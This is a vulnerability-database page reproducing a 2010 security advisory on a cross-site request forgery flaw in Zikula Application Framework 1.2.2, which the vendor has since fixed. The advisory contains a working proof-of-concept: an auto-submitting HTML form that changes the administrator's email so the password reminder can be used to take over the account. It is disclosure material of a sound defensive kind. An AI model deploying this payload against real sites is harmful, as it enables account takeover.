Lucene search
K

Zikula Application Framework 1.2.2 Cross Site Request Forgery

🗓️ 05 May 2010 00:00:00Reported by High-Tech Bridge SAType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 14 Views

Zikula Application Framework 1.2.2 CSRF vulnerability allows unauthorized email change

Code
`Vulnerability ID: HTB22351  
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_zikula_application_framework.html  
Product: Zikula Application Framework  
Vendor: Zikula Software Foundation  
Vulnerable Version: 1.2.2 and Probably Prior Versions  
Vendor Notification: 19 April 2010   
Vulnerability Type: CSRF (Cross-Site Request Forgery)  
Status: Fixed by Vendor  
Risk level: Low   
Credit: High-Tech Bridge SA (http://www.htbridge.ch/)   
  
Vulnerability Details:  
The vulnerability exists due to failure in the "users" module to properly verify the source of HTTP request.   
  
User can perform CSRF attack and change the email of administrator. Then the user can use the password reminder system and get the administrator password on this email address.  
  
Successful exploitation of this vulnerability could result in a compromise of the application, modification of sensitive data.   
  
Attacker can use browser to exploit this vulnerability. The following PoC is available:   
  
  
<form method="POST" action="http://host/index.php?module=users&func=updateemail" name="main">  
<input type="hidden" name="newemail" value="[email protected]">  
<input type="hidden" name="submit" value="">  
</form>  
<script>  
document.main.submit();  
</script>  
  
  
Solution: Upgrade to the most recent verison  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation